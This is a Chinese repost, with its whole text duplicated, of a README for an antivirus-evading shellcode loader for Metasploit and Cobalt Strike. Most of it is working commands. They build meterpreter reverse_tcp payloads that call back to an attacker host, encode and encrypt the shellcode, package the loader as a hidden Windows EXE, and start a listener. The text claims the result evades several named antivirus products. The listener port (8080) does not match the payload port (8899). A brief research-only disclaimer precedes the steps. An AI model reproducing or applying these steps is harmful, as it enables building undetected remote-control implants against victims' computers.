admin管理员组文章数量:1130349
ShellCode
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
文章目录
- ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
- 一、声明
- 二、测试环境
- 三、生成Msf_Payload
- 四、生成CobaltStrike_Payload
- 五、加密Payload
- 六、配置ShellCode加载器
- 七、打包可执行程序(EXE编译环境)
- 八、上线测试
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。
一、声明
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!
代码未经过大量测试,如发现问题请提交 issue。
二、测试环境
截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)
Windows 7 64位 或以上操作系统应该都没问题(没有测试)
三、生成Msf_Payload
默认
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f py -o payload.c
XOR 编码器
msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
动态密钥XOR编码器
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
Zutto Dekiru
msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
四、生成CobaltStrike_Payload
选择使用x64的C语言或Python语言的Shellcode。
得到:payload.c
五、加密Payload
Shellcode_encryption.exe payload.c
六、配置ShellCode加载器
将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode’处
示例:
七、打包可执行程序(EXE编译环境)
Python 3.8.6
pyinstaller 4.7
pip install -r requirements.txt -i
pyinstaller -F -w ShellCode_Loader.py
生成ShellCode_Loader.exe在dist目录中。
八、上线测试
运行监听
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run
项目地址:
ShellCode
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
文章目录
- ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
- 一、声明
- 二、测试环境
- 三、生成Msf_Payload
- 四、生成CobaltStrike_Payload
- 五、加密Payload
- 六、配置ShellCode加载器
- 七、打包可执行程序(EXE编译环境)
- 八、上线测试
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。
一、声明
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!
代码未经过大量测试,如发现问题请提交 issue。
二、测试环境
截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)
Windows 7 64位 或以上操作系统应该都没问题(没有测试)
三、生成Msf_Payload
默认
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f py -o payload.c
XOR 编码器
msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
动态密钥XOR编码器
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
Zutto Dekiru
msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
四、生成CobaltStrike_Payload
选择使用x64的C语言或Python语言的Shellcode。
得到:payload.c
五、加密Payload
Shellcode_encryption.exe payload.c
六、配置ShellCode加载器
将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode’处
示例:
七、打包可执行程序(EXE编译环境)
Python 3.8.6
pyinstaller 4.7
pip install -r requirements.txt -i
pyinstaller -F -w ShellCode_Loader.py
生成ShellCode_Loader.exe在dist目录中。
八、上线测试
运行监听
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run
项目地址:
本文标签: ShellCode
版权声明:本文标题:ShellCode 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://it.en369.cn/jiaocheng/1700077679a336926.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。


发表评论